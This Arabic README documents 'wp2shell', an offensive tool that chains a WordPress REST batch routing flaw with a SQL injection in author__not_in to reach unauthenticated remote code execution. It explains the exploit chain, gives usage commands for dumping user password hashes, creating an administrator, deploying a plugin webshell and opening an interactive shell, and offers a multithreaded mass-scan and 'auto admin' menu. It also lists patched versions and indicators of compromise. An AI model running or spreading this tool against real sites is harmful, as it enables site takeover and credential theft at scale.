
أداة استغلال بلغة Python تربط بين CVE-2026-63030 الخاص بارتباك مسارات REST batch مع CVE-2026-60137 الخاص بحقن SQL لتحقيق تنفيذ أوامر عن بُعد (RCE) غير مُصادَق عليه في WordPress، وقراءة قاعدة البيانات، ونشر webshell.
المؤلف: LANGZ
CVE: CVE-2026-63030 (متسلسلة مع CVE-2026-60137)
الخطورة: حرجة (CVSS 9.8)
النوع: تنفيذ تعليمات برمجية عن بُعد قبل المصادقة (RCE)
تُقدَّم هذه الأداة بشكل صارم لأغراض تعليمية واختبار أمني مُصرَّح به فقط.
باستخدامك لهذه الأداة، فإنك توافق على ما يلي:
إذا استخدمت هذه الأداة ضد نظام دون تصريح، فأنت ترتكب جريمة.
المؤلف لا يتغاضى عن هذه الأفعال ولا يدعمها ولا يتحمل أي مسؤولية عنها.
CVE-2026-63030 هو خلل التباس في توجيه دفعات REST API (CWE-436) في نواة WordPress، أُدخل في الإصدار 6.9. عند تسلسله مع CVE-2026-60137 (حقن SQL أعمى في معامل author__not_in الخاص بـ WP_Query)، فإنه يسمح لمهاجم غير مُصادَق بتحقيق تنفيذ تعليمات برمجية عن بُعد كامل على تثبيت WordPress افتراضي.
ما يمكن للمهاجم فعله:
لماذا هو خطير:
حدِّث WordPress إلى إصدار مُرقَّع:
| الإصدار الحالي | التحديث إلى |
|---|---|
| 6.9.0 – 6.9.4 | 6.9.5 |
| 7.0.0 – 7.0.1 | 7.0.2 |
| 6.8.0 – 6.8.5 | 6.8.6 (إصلاح حقن SQL فقط) |
ملاحظة: فعَّل WordPress التحديثات التلقائية الإجبارية، لكن المواقع التي عطَّلت التحديثات التلقائية أو الاستضافة المُدارة التي تؤخر التحديثات تبقى مكشوفة. تحقق من نجاح تطبيق التحديث.
POST إلى /wp-json/batch/v1POST إلى ?rest_route=/batch/v1ابحث عن:
POST غير معتادة إلى /wp-json/batch/v1 أو ?rest_route=/batch/v1 في سجلات الوصول/wp-content/cache/ أو أدلة أخرى يمكن الوصول إليها عبر الويبإذا وجدت مؤشرات على الاختراق، فإن مجرد إزالة الملفات وحساب المسؤول لا يكفي. نفِّذ استجابة كاملة للحوادث وفكِّر في إعادة بناء النظام بالكامل.
تجمع سلسلة الاستغلال بين ثغرتين:
يحتوي معالج دفعات REST API في WordPress (serve_batch_request_v1) على خلل فهرسة بإزاحة واحد. عندما يفشل wp_parse_url() على مسار طلب فرعي (مثل "///")، يُدفع WP_Error الناتج إلى $validation[] لكن ليس إلى $matches[]. هذا يُفقد التزامن بين المصفوفتين، مما يؤدي إلى إرسال كل طلب لاحق تحت معالج خاطئ.
من خلال تضمين دفعة مُهيكلة بعناية داخل دفعة أخرى، يمكن للمهاجم توجيه طلب تم التحقق منه بواسطة مخطط نقطة نهاية واحدة عبر استدعاء نقطة نهاية مختلفة تمامًا — متجاوزًا فحوصات الأذونات بالكامل.
يستقر الطلب المُلبَّس في معامل author__not_in الخاص بـ WP_Query. يحوِّل WordPress السلسلة النصية إلى مصفوفة لكنه يتخطى تعقيم absint()، مما يسمح بحقن SQL خام. تستخدم الأداة هذا من أجل:
UNION SELECT)WP_Post مزيفةبمجرد اكتمال الإعداد (اكتشاف بادئة الجدول ومعرّف المسؤول)، تُطلق حزمة تصعيد الصلاحيات في طلب HTTP واحد:
UNION)ثم تستخدم الأداة بيانات اعتماد المسؤول المُنشأة لنشر webshell قائم على إضافة لتنفيذ أوامر نظام التشغيل.
# Single target check
python3 wp2shell.py http://target.com
# Check with active SQLi confirmation
python3 wp2shell.py http://target.com --confirm-sqli
# Read database (fingerprint)
python3 wp2shell.py http://target.com --read --preset fingerprint
# Read user logins and password hashes
python3 wp2shell.py http://target.com --read --preset users
# Deploy webshell and run a command
python3 wp2shell.py http://target.com --shell --cmd id
# Interactive shell
python3 wp2shell.py http://target.com --shell -i
# Mass scan from file
python3 wp2shell.py targets.txt
شغِّل بدون معاملات لفتح القائمة التفاعلية:
python3 langz.py
══════════════════════════════════════════════════════════════
██╗ █████╗ ███╗ ██╗ ██████╗ ███████╗
██║ ██╔══██╗████╗ ██║██╔════╝ ╚══███╔╝
██║ ███████║██╔██╗ ██║██║ ███╗ ███╔╝
██║ ██╔══██║██║╚██╗██║██║ ██║ ███╔╝
███████╗██║ ██║██║ ╚████║╚██████╔╝███████╗
╚══════╝╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═════╝ ╚══════╝
▓▒░ L A N G Z T O O L S ░▒▓
Author : LANGZ
CVE : (CVE-2026-63030)
──────────────────────────────────────────────────────────────
[1] Single Target - Check
[2] Mass Target - Check
[3] Single Target - Auto Admin
[4] Mass Target - Auto Admin
[5] Exit
──────────────────────────────────────────────────────────────
Results -> Results/results.txt
══════════════════════════════════════════════════════════════
يُقدَّم هذا المشروع لأغراض تعليمية واختبار أمني مُصرَّح به فقط.
المؤلف LANGZ لا يتحمل أي مسؤولية عن أي سوء استخدام أو ضرر ناتج عن هذه الأداة.
المؤلف: LANGZ
CVE: CVE-2026-63030
| الجانب | التفصيل |
|---|
| الإصدارات المتأثرة | WordPress 6.9.0 – 6.9.4، WordPress 7.0.0 – 7.0.1 |
| المتأثرة بحقن SQL فقط | WordPress 6.8.0 – 6.8.5 (CVE-2026-60137 فقط) |
| المصادقة المطلوبة | لا شيء |
| تفاعل المستخدم | لا شيء |
| التأثير | اختراق كامل للموقع — قراءة/كتابة قاعدة البيانات، رفع ملفات PHP عشوائية، تنفيذ أوامر نظام التشغيل |
| حالة الاستغلال | يُستغَل بنشاط في البرية؛ تم رصد أكثر من 62,802 عنوان IP مهاجم فريد |
| العلم | الوصف |
|---|
--timeout | مهلة الطلب بالثواني (الافتراضي: 15) |
--proxy | وكيل HTTP (مثل http://127.0.0.1:8080) |
--threads | خيوط متوازية للفحص الجماعي (الافتراضي: 50) |
--sleep | تأخير توقيت SQL للتأكيد الأعمى (الافتراضي: 3) |
--samples | أزواج التوقيت للتأكيد (الافتراضي: 3) |
--confirm-sqli | إرسال حزمة تأكيد حقن SQL النشطة |
--preset | fingerprint أو users |
--query | تعبير SQL مخصص للقراءة |
--prefix | بادئة جدول قاعدة البيانات (الافتراضي: wp_) |
--max-length | الحد الأقصى للأحرف لكل قيمة (الافتراضي: 128) |
--technique | auto أو union أو blind أو error |
--user | اسم مستخدم المسؤول (لـ --shell) |
--password | كلمة مرور المسؤول (لـ --shell) |
--cmd | الأمر المراد تنفيذه على الهدف |
-i, --interactive | فتح صدفة تفاعلية |